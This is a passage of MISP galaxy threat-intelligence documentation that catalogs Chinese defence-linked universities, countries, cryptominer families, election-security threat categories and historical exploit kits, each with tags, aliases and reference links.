The tag is: `misp-galaxy:china-defence-universities="Xiangtan University (湘潭大学)"

Table 713. Table References

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**Xidian University (西安电子科技大学)**

Xidian University is among China’s top universities for research on antennas, radar, electronic countermeasures and computer science. The university is subordinate to the Ministry of Education and is also jointly supervised by defence industry agency SASTIND and defence electronics conglomerate CETC. It claims it has ‘made important contributions to military modernisation’. The
university is closely tied to China’s defense industry and the PLA. It runs at least five defence laboratories and partners with the PLA’s signals intelligence organization. Xidian appears to be an important training ground for Chinese military hackers. According to Xidian’s party secretary, the university has had an ‘unbreakable bond with secret intelligence work since its beginning’. It also holds secret-level security credentials that allow it to work on classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Xidian University (西安电子科技大学)"

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**Yanshan University (燕山大学)**

The university was formed as an offshoot of Harbin Institute of Technology, one of China’s top defence universities, in 1960. The university continues to prioritise defence research and is jointly supervised by the Hebei Provincial Government together with the Ministry of Education, Ministry of Industry and Information Technology and defence industry agency SASTIND. YSU’s Defense Science and Technology Institute was established in 2006 under the support of COSTIND (a defence industry agency that has been replaced by SASTIND) to expand and oversee defence research at the university. The institute has driven the university’s involvement in space-related defence research through the establishment of laboratories such as the Key Laboratory of Fundamental Science of Mechanical Structure and Materials Science Under Extreme Conditions. Four fields of research at YSU are officially designated as defence disciplines: control theory and control science, electrical circuits and systems, mechanical design and theory, and materials science and engineering. The university holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Yanshan University (燕山大学)"

Table 715. Table References

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**Yunnan Normal University (云南师范大学)**

YNNU is a Chinese university subordinate to the Yunnan Provincial Government. Since 2013 it has also been supervised by the Ministry of Education. The university has been focused on training teacher since its inception as the Kunming Teachers College (昆明师范学院) in 1950. YNNU now has a broader focus on a variety of humanities, social and natural science disciplines. YNNU is organised into numerous faculties, some of which are relevant for communist party cadre training.

The tag is: misp-galaxy:china-defence-universities="Yunnan Normal University (云南师范大学)"

Table 716. Table References

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Zhejiang University (浙江大学)

ZJU is subordinate to the Ministry of Education and jointly constructed with defence industry agency SASTIND. This arrangement with SASTIND began in 2016 and is designed to deepen the university’s involvement in defence research. The university holds secret-level security credentials, allowing it to work on classified military projects. The university’s total research funding amounts to RMB4.56 billion (AUD940 million) in 2018. It has at least three defence laboratories, with one source claiming that the university had ten key national laboratories (国家重点实验室) as of 2015. These laboratories are involved in research on computer simulations, high-performance computing and control science. The university also carries out cyber security research and receives funding for this work from the MSS, China’s civilian intelligence agency. ZJU cooperates extensively with international universities and companies, with upwards of 40 international joint S&T research labs. The College of Electrical Engineering has joint labs with U.S. companies in key industries, such as Rockwell Automation in the field of information technology, and the National Semiconductor Corporation. Additionally, the university has a joint research lab with U.S company Microsoft.

The tag is: `misp-galaxy:china-defence-universities="Zhejiang University (浙江大学)"`

Table 717. Table References

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Hong Kong
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Heard Island and McDonald Islands
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Croatia
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Ireland
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Israel
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Isle of Man
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india
India
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british indian ocean territory
British Indian Ocean Territory
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Kiribati
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Comoros
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Saint Kitts and Nevis
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North Korea
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kōsōvo
Kosovo
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Cayman Islands
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Lebanon
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Saint Lucia
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liətʃənstitən
Liechtenstein
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sri lanka
Sri Lanka
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Saint Martin
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marshall islands
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north macedonia
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myanmar

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mongolia

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macao

Macao
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northern mariana islands

Northern Mariana Islands
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martinique

Martinique
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mauritania

Mauritania
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montserrat

Montserrat
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malta

Malta
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**maldives**
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**mexico**
Mexico
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**malaysia**
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Mozambique
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**new caledonia**
New Caledonia
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nigeria
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saint pierre and miquelon
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qatar
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Romania
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Serbia
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russia
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sweden
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singapore
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Saint Helena
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turks and caicos islands
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Tonga
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Turkey
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ukraine
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uganda
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united states minor outlying islands
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united states
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uzbekistan
Uzbekistan
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vatican
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u.s. virgin islands
U.S. Virgin Islands
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Vietnam
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vanuatu
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wallis and futuna
Wallis and Futuna
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mayotte
Mayotte
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south africa
South Africa
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zambia
Zambia
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zimbabwe
Zimbabwe
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serbia and montenegro
Serbia and Montenegro
The tag is: `misp-galaxy:country="serbia and montenegro"`

netherlands antilles
Netherlands Antilles
The tag is: `misp-galaxy:country="netherlands antilles"`

Cryptominers
A list of cryptominer and cryptojacker malware.

Cryptominers is a cluster galaxy available in JSON format at [this location](#). The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
Cisco Talos - raw-data

Lemon Duck
The infection starts with a PowerShell loading script, which is copied from other infected systems via SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue.

The tag is: `misp-galaxy:cryptominers="Lemon Duck"`

Lemon Duck is also known as:

**Table 718. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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</table>

WannaMine
WannaMine is a cryptojacker that takes advantage of EternalBlue.
The tag is: `misp-galaxy:cryptominers="WannaMine"`

WannaMine is also known as:

**Table 719. Table References**

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<tr>
<td><a href="https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/?utm_campaign=dsa&amp;utm_content=us&amp;utm_medium=sem&amp;utm_source=goog&amp;utm_term=&amp;gclid=EAIaIQobChMIjrayysrX7AIVFUWGCh3sQApKEAAYASAEgIE6_D_BwE">https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/?utm_campaign=dsa&amp;utm_content=us&amp;utm_medium=sem&amp;utm_source=goog&amp;utm_term=&amp;gclid=EAIaIQobChMIjrayysrX7AIVFUWGCh3sQApKEAAYASAEgIE6_D_BwE</a></td>
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<td><a href="https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/">https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/</a></td>
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<td><a href="https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry">https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry</a></td>
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</table>

**Election guidelines**

Universal Development and Security Guidelines as Applicable to Election Technology.

Election guidelines is a cluster galaxy available in JSON format at [this location](https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf). The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

NIS Cooperation Group

**Tampering with registrations**

Tampering with registrations

The tag is: `misp-galaxy:guidelines="Tampering with registrations"`

**Table 720. Table References**

<table>
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**DoS or overload of party/campaign registration, causing them to miss the deadline**

DoS or overload of party/campaign registration, causing them to miss the deadline

The tag is: `misp-galaxy:guidelines="DoS or overload of party/campaign registration, causing them to miss the deadline"`
Fabricated signatures from sponsor

Fabricated signatures from sponsor

The tag is: `misp-galaxy:guidelines="Fabricated signatures from sponsor"`

Identity fraud during voter registration

Identity fraud during voter registration

The tag is: `misp-galaxy:guidelines="Identity fraud during voter registration"`

Deleting or tampering with voter data

Deleting or tampering with voter data

The tag is: `misp-galaxy:guidelines="Deleting or tampering with voter data"`

DoS or overload of voter registration system, suppressing voters

DoS or overload of voter registration system, suppressing voters

The tag is: `misp-galaxy:guidelines="DoS or overload of voter registration system, suppressing voters"`
Hacking candidate laptops or email accounts

Hacking candidate laptops or email accounts

The tag is: misp-galaxy:guidelines="Hacking candidate laptops or email accounts"

Hacking campaign websites (defacement, DoS)

Hacking campaign websites (defacement, DoS)

The tag is: misp-galaxy:guidelines="Hacking campaign websites (defacement, DoS)"

Misconfiguration of a website

Misconfiguration of a website

The tag is: misp-galaxy:guidelines="Misconfiguration of a website"

Leak of confidential information

Leak of confidential information

The tag is: misp-galaxy:guidelines="Leak of confidential information"
Hacking/misconfiguration of government servers, communication networks, or endpoints

Hacking/misconfiguration of government servers, communication networks, or endpoints

The tag is: misp-galaxy:guidelines="Hacking/misconfiguration of government servers, communication networks, or endpoints"

Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results

Hacking government websites, spreading misinformation on the election process, registered parties/candidates, or results

The tag is: misp-galaxy:guidelines="Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results"

DoS or overload of government websites

DoS or overload of government websites

The tag is: misp-galaxy:guidelines="DoS or overload of government websites"
Tampering or DoS of voting and/or vote confidentiality during or after the elections

Tampering or DoS of voting and/or vote confidentiality during or after the elections

The tag is: misp-galaxy:guidelines="Tampering or DoS of voting and/or vote confidentiality during or after the elections"

Table 733. Table References

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Software bug altering results

Software bug altering results

The tag is: misp-galaxy:guidelines="Software bug altering results"

Table 734. Table References

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Tampering with logs/journals

Tampering with logs/journals

The tag is: misp-galaxy:guidelines="Tampering with logs/journals"

Table 735. Table References

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Breach of voters privacy during the casting of votes

Breach of voters privacy during the casting of votes

The tag is: misp-galaxy:guidelines="Breach of voters privacy during the casting of votes"

Table 736. Table References

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**Tampering, DoS or overload of the systems used for counting or aggregating results**

Tampering, DoS or overload of the systems used for counting or aggregating results

The tag is: `misp-galaxy:guidelines="Tampering, DoS or overload of the systems used for counting or aggregating results"`

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**Tampering or DoS of communication links used to transfer (interim) results**

Tampering or DoS of communication links used to transfer (interim) results

The tag is: `misp-galaxy:guidelines="Tampering or DoS of communication links used to transfer (interim) results"`

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</thead>
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**Tampering with supply chain involved in the movement or transfer data**

Tampering with supply chain involved in the movement or transfer data

The tag is: `misp-galaxy:guidelines="Tampering with supply chain involved in the movement or transfer data"`

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<th>Table 739. Table References</th>
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Hacking of internal systems used by media or press

The tag is: misp-galaxy:guidelines="Hacking of internal systems used by media or press"

Table 740. Table References

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Tampering, DoS, or overload of media communication links

The tag is: misp-galaxy:guidelines="Tampering, DoS, or overload of media communication links"

Table 741. Table References

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Defacement, DoS or overload of websites or other systems used for publication of the results

The tag is: misp-galaxy:guidelines="Defacement, DoS or overload of websites or other systems used for publication of the results"

Table 742. Table References

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Exploit-Kit

Exploit-Kit is an enumeration of some exploitation kits used by adversaries. The list includes document, browser and router exploit kits. It's not meant to be totally exhaustive but aim at covering the most seen in the past 5 years.
Exploit-Kit is a cluster galaxy available in JSON format at [this location](#) The JSON format can be freely reused in your application or automatically enabled in MISP.

**authors**

Kafeine - Will Metcalf - KahuSecurity

**Astrum**

Astrum Exploit Kit is a private Exploit Kit used in massive scale malvertising campaigns. It's notable by its use of Steganography.

The tag is: `misp-galaxy:exploit-kit="Astrum"`

Astrum is also known as:

- Stegano EK

**Table 743. Table References**

<table>
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<tr>
<th>Links</th>
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</table>

**Underminer**

Underminer EK is an exploit kit that seems to be used privately against users in Asia. Functionalities: browser profiling and filtering, preventing of client revisits, URL randomization, and asymmetric encryption of payloads.

The tag is: `misp-galaxy:exploit-kit="Underminer"`

Underminer is also known as:

- Underminer EK

**Table 744. Table References**

<table>
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**Fallout**

Fallout Exploit Kit appeared at the end of August 2018 as an updated Nuclear Pack featuring current exploits seen in competing Exploit Kit.
The tag is: `misp-galaxy:exploit-kit="Fallout"`

Fallout is also known as:

- Fallout

Fallout has relationships with:

- dropped: `misp-galaxy:ransomware="GandCrab"` with `estimative-language:likelihood-probability="almost-certain"`

**Table 745. Table References**

<table>
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**Bingo**

Bingo EK is the name chosen by the defense for a Fiesta-ish EK first spotted in March 2017 and targeting at that times mostly Russia

The tag is: `misp-galaxy:exploit-kit="Bingo"`

**Terror EK**

Terror EK is built on Hunter, Sundown and RIG EK code

The tag is: `misp-galaxy:exploit-kit="Terror EK"`

Terror EK is also known as:

- Blaze EK
- Neptune EK

**Table 746. Table References**

<table>
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<th>Links</th>
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**DealersChoice**

DealersChoice is a Flash Player Exploit platform triggered by RTF.
DealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Network researchers analyzed two variants—variant A, which is a standalone variant including Flash exploit code packaged with a payload, and variant B, which is a modular variant that loads exploit code on demand. This new component appeared in 2016 and is still in use.

The tag is: *misp-galaxy:exploit-kit=*"DealersChoice"

DealersChoice is also known as:

- Sednit RTF EK

Table 747. Table References

<table>
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<tr>
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<tbody>
<tr>
<td><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/</a></td>
</tr>
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</table>

DNSChanger

DNSChanger Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: *misp-galaxy:exploit-kit=*"DNSChanger"

DNSChanger is also known as:

- RouterEK

Table 748. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html">http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html</a></td>
</tr>
</tbody>
</table>

Novidade

Novidade Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: *misp-galaxy:exploit-kit=*"Novidade"

Novidade is also known as:

- DNSGhost

Table 749. Table References
Disdain

Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula

The tag is: `misp-galaxy:exploit-kit="Disdain"`

**Kaixin**

Kaixin is an exploit kit mainly seen behind compromised website in Asia

The tag is: `misp-galaxy:exploit-kit="Kaixin"`

Kaixin is also known as:

- CK vip

**Magnitude**

Magnitude EK

The tag is: `misp-galaxy:exploit-kit="Magnitude"`

Magnitude is also known as:

- Popads EK
- TopExp
- Magniber
- Magnitude EK
MWI

Microsoft Word Intruder is an exploit kit focused on Word and embedded flash exploits. The author wants to avoid their customer to use it in mass spam campaign, so it's most often connected to semi-targeted attacks.

The tag is: misp-galaxy:exploit-kit="MWI"

**Table 753. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/10/Magnitude.html">http://malware.dontneedcoffee.com/2013/10/Magnitude.html</a></td>
</tr>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html">http://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html</a></td>
</tr>
</tbody>
</table>

ThreadKit

ThreadKit is the name given to a widely used Microsoft Office document exploit builder kit that appeared in June 2017.

The tag is: misp-galaxy:exploit-kit="ThreadKit"

**Table 754. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html">https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html</a></td>
</tr>
</tbody>
</table>

VenomKit

VenomKit is the name given to a kit sold since April 2017 as "Word 1day exploit builder" by user badbullzvenom. Author allows only use in targeted campaign. Is used for instance by the "Cobalt Gang"

The tag is: misp-galaxy:exploit-kit="VenomKit"

VenomKit is also known as:
• Venom

Table 755. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

Taurus Builder

Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user "badbullzvenom".

The tag is: `misp-galaxy:exploit-kit="Taurus Builder"`

RIG

RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by "vip" customers and when RIG 3 was still in use.

The tag is: `misp-galaxy:exploit-kit="RIG"`

RIG is also known as:

• RIG 3
• RIG-v
• RIG 4
• Meadgive

Table 756. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.kahusecurity.com/2014/rig-exploit-pack/">http://www.kahusecurity.com/2014/rig-exploit-pack/</a></td>
</tr>
</tbody>
</table>

Spelevo

Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK
The tag is: `misp-galaxy:exploit-kit="Spelevo"`

### Sednit EK

Sednit EK is the exploit kit used by APT28

The tag is: `misp-galaxy:exploit-kit="Sednit EK"`

Sednit EK is also known as:

- SedKit

### Sundown-P

Sundown-P/Sundown-Pirate is a rip of Sundown seen used in a private way (One group using it only) - First spotted at the end of June 2017, branded as CaptainBlack in August 2017

The tag is: `misp-galaxy:exploit-kit="Sundown-P"`

Sundown-P is also known as:

- Sundown-Pirate
- CaptainBlack

### Bizarro Sundown

Bizarro Sundown appears to be a fork of Sundown with added anti-analysis features

The tag is: `misp-galaxy:exploit-kit="Bizarro Sundown"`

Bizarro Sundown is also known as:
• Sundown-b

Table 760. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/">https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/</a></td>
</tr>
</tbody>
</table>

**Hunter**

Hunter EK is an evolution of 3Ros EK

The tag is: *misp-galaxy:exploit-kit="Hunter”*

Hunter is also known as:

• 3ROS Exploit Kit

Hunter has relationships with:

• similar: *misp-galaxy:tool="Tinba"* with *estimative-language:likelihood-probability="likely”*

Table 761. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

**GreenFlash Sundown**

GreenFlash Sundown is a variation of Bizarro Sundown without landing

The tag is: *misp-galaxy:exploit-kit="GreenFlash Sundown”*

GreenFlash Sundown is also known as:

• Sundown-GF

Table 762. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

**Angler**

The Angler Exploit Kit has been the most popular and evolved exploit kit from 2014 to middle of 2016. There was several variation. The historical “indexm” variant was used to spread Lurk. A vip
version used notably to spread Poweliks, the "standard" commercial version, and a declinaison tied to load selling (mostly bankers) that can be associated to EmpirePPC

The tag is: *misp-galaxy:exploit-kit="Angler"*

Angler is also known as:

- XXX
- AEK
- Axpergle

*Table 763. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html">http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html</a></td>
</tr>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html</a></td>
</tr>
</tbody>
</table>

**Archie**

Archie EK

The tag is: *misp-galaxy:exploit-kit="Archie"*

*Table 764. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit">https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit</a></td>
</tr>
</tbody>
</table>

**BlackHole**

The BlackHole Exploit Kit has been the most popular exploit kit from 2011 to 2013. Its activity stopped with Paunch’s arrest (all activity since then is anecdotal and based on an old leak)

The tag is: *misp-galaxy:exploit-kit="BlackHole"*

BlackHole is also known as:

- BHEK

BlackHole has relationships with:

- similar: *misp-galaxy:rat="BlackHole"* with *estimative-language:likelihood-probability="likely"*

*Table 765. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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</table>
Bleeding Life

Bleeding Life is an exploit kit that became open source with its version 2

The tag is: `misp-galaxy:exploit-kit="Bleeding Life"

Bleeding Life is also known as:

- BL
- BL2

Table 766. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

Cool

The Cool Exploit Kit was a kind of BlackHole VIP in 2012/2013

The tag is: `misp-galaxy:exploit-kit="Cool"

Cool is also known as:

- CEK
- Styxy Cool

Table 767. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html">http://malware.dontneedcoffee.com/2012/10/newcoolek.html</a></td>
</tr>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html</a></td>
</tr>
<tr>
<td><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/">http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/</a></td>
</tr>
</tbody>
</table>

Fiesta

Fiesta Exploit Kit

The tag is: `misp-galaxy:exploit-kit="Fiesta"

Fiesta is also known as:

- NeoSploit
- Fiexp
Empire

The Empire Pack is a variation of RIG operated by a load seller. It's being fed by many traffic actors.

The tag is: `misp-galaxy:exploit-kit="Empire"`

Empire is also known as:

- RIG-E

Empire has relationships with:

- similar: `misp-galaxy:tool="Empire"` with `estimative-language:likelihood-probability="likely"`

FlashPack

FlashPack EK got multiple fork. The most common variant seen was the standalone Flash version.

The tag is: `misp-galaxy:exploit-kit="FlashPack"`

FlashPack is also known as:

- FlashEK
- SafePack
- CritXPack
- Vintage Pack

Glazunov

Glazunov is an exploit kit mainly seen behind compromised website in 2012 and 2013. Glazunov
compromission is likely the ancestor activity of what became EITest in July 2014. Sibhost and Filmkit later shown similarities with this Exploit Kit

The tag is: `misp-galaxy:exploit-kit="Glazunov"`

**Table 771. Table References**

<table>
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<tr>
<th>Links</th>
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</thead>
</table>

**GrandSoft**

GrandSoft Exploit Kit was a quite common exploit kit used in 2012/2013. Disappeared between march 2014 and September 2017

The tag is: `misp-galaxy:exploit-kit="GrandSoft"`

GrandSoft is also known as:

- StampEK
- SofosFO

**Table 772. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html">http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html</a></td>
</tr>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html">http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html</a></td>
</tr>
</tbody>
</table>

**HanJuan**

Hanjuan EK was a one actor fed variation of Angler EK used in evolved malvertising chain targeting USA. It has been using a 0day (CVE-2015-0313) from beginning of December 2014 till beginning of February 2015

The tag is: `misp-galaxy:exploit-kit="HanJuan"`

**Table 773. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.malwaresigs.com/2013/10/14/unknown-ek/">http://www.malwaresigs.com/2013/10/14/unknown-ek/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/kafeine/status/562575744501428226">https://twitter.com/kafeine/status/562575744501428226</a></td>
</tr>
</tbody>
</table>
**Himan**

Himan Exploit Kit

The tag is: `misp-galaxy:exploit-kit="Himan"`

Himan is also known as:

- High Load

*Table 774. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/10/HiMan.html">http://malware.dontneedcoffee.com/2013/10/HiMan.html</a></td>
</tr>
</tbody>
</table>

**Impact**

Impact EK

The tag is: `misp-galaxy:exploit-kit="Impact"`

*Table 775. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>

**Infinity**

Infinity is an evolution of Redkit

The tag is: `misp-galaxy:exploit-kit="Infinity"`

Infinity is also known as:

- Redkit v2.0
- Goon

*Table 776. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html">http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html</a></td>
</tr>
</tbody>
</table>

**Lightsout**

Lightsout Exploit Kit has been used in Watering Hole attack performed by the APT Group havex

The tag is: `misp-galaxy:exploit-kit="Lightsout"`
Table 777. Table References

Links

http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html
http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html

Nebula

Nebula Exploit Kit has been built on Sundown source and features an internal TDS

The tag is: misp-galaxy:exploit-kit="Nebula"

Table 778. Table References

Links

http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html

Neutrino

Neutrino Exploit Kit has been one of the major exploit kit from its launch in 2013 till september 2016 when it become private (defense name for this variation is Neutrino-v). This EK vanished from march 2014 till november 2014.

The tag is: misp-galaxy:exploit-kit="Neutrino"

Neutrino is also known as:

- Job314
- Neutrino Rebooted
- Neutrino-v

Neutrino has relationships with:

- similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

Table 779. Table References

Links

http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

Niteris

Niteris was used mainly to target Russian.
The tag is: `misp-galaxy:exploit-kit="Niteris"`

Niteris is also known as:

- CottonCastle

Table 780. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html">http://malware.dontneedcoffee.com/2014/06/cottoncastle.html</a></td>
</tr>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html">http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html</a></td>
</tr>
</tbody>
</table>

**Nuclear**

The Nuclear Pack appeared in 2009 and has been one of the longer living one. Spartan EK was a landing less variation of Nuclear Pack.

The tag is: `misp-galaxy:exploit-kit="Nuclear"`

Nuclear is also known as:

- NEK
- Nuclear Pack
- Spartan
- Neclu

Table 781. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/">http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/</a></td>
</tr>
</tbody>
</table>

**Phoenix**

Phoenix Exploit Kit

The tag is: `misp-galaxy:exploit-kit="Phoenix"`

Phoenix is also known as:

- PEK

Table 782. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
Private Exploit Pack

Private Exploit Pack

The tag is: `misp-galaxy:exploit-kit="Private Exploit Pack"`

Private Exploit Pack is also known as:

- PEP

Table 783. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html">http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html</a></td>
</tr>
</tbody>
</table>

Redkit

Redkit has been a major exploit kit in 2012. One of its specific features was to allow its access against a share of a percentage of the customer’s traffic

The tag is: `misp-galaxy:exploit-kit="Redkit"`

Table 784. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2012/05/inside-redkit.html">http://malware.dontneedcoffee.com/2012/05/inside-redkit.html</a></td>
</tr>
<tr>
<td><a href="https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/">https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/</a></td>
</tr>
</tbody>
</table>

Sakura

Sakura Exploit Kit appeared in 2012 and was adopted by several big actor

The tag is: `misp-galaxy:exploit-kit="Sakura"`

Table 785. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html">http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html</a></td>
</tr>
</tbody>
</table>

SPL

SPL exploit kit was mainly seen in 2012/2013 most often associated with ZeroAccess and Scareware/FakeAV

The tag is: `misp-galaxy:exploit-kit="SPL"`
SPL is also known as:

- SPL_Data
- SPLNet
- SPL2

Table 786. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/">http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/</a></td>
<td></td>
</tr>
</tbody>
</table>

**Sundown**

Sundown Exploit Kit is mainly built out of stolen code from other exploit kits

The tag is: `misp-galaxy:exploit-kit="Sundown"

Sundown is also known as:

- Beps
- Xer
- Beta

Table 787. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road">https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road</a></td>
<td></td>
</tr>
</tbody>
</table>

**Sweet-Orange**

Sweet Orange

The tag is: `misp-galaxy:exploit-kit="Sweet-Orange"

Sweet-Orange is also known as:

- SWO
- Anogre

Table 788. Table References

<table>
<thead>
<tr>
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</table>
Styx

Styx Exploit Kit

The tag is: `misp-galaxy:exploit-kit="Styx"`

Table 789. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/05/inside-styx-2013-05.html">http://malware.dontneedcoffee.com/2013/05/inside-styx-2013-05.html</a></td>
</tr>
</tbody>
</table>

WhiteHole

WhiteHole Exploit Kit appeared in January 2013 in the tail of the CVE-2013-0422

The tag is: `misp-galaxy:exploit-kit="WhiteHole"`

Table 790. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html">http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html</a></td>
</tr>
</tbody>
</table>

Unknown

Unknown Exploit Kit. This is a place holder for any undocumented Exploit Kit. If you use this tag, we will be more than happy to give the associated EK a deep look.

The tag is: `misp-galaxy:exploit-kit="Unknown"`

Table 791. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/kafeine">https://twitter.com/kafeine</a></td>
</tr>
<tr>
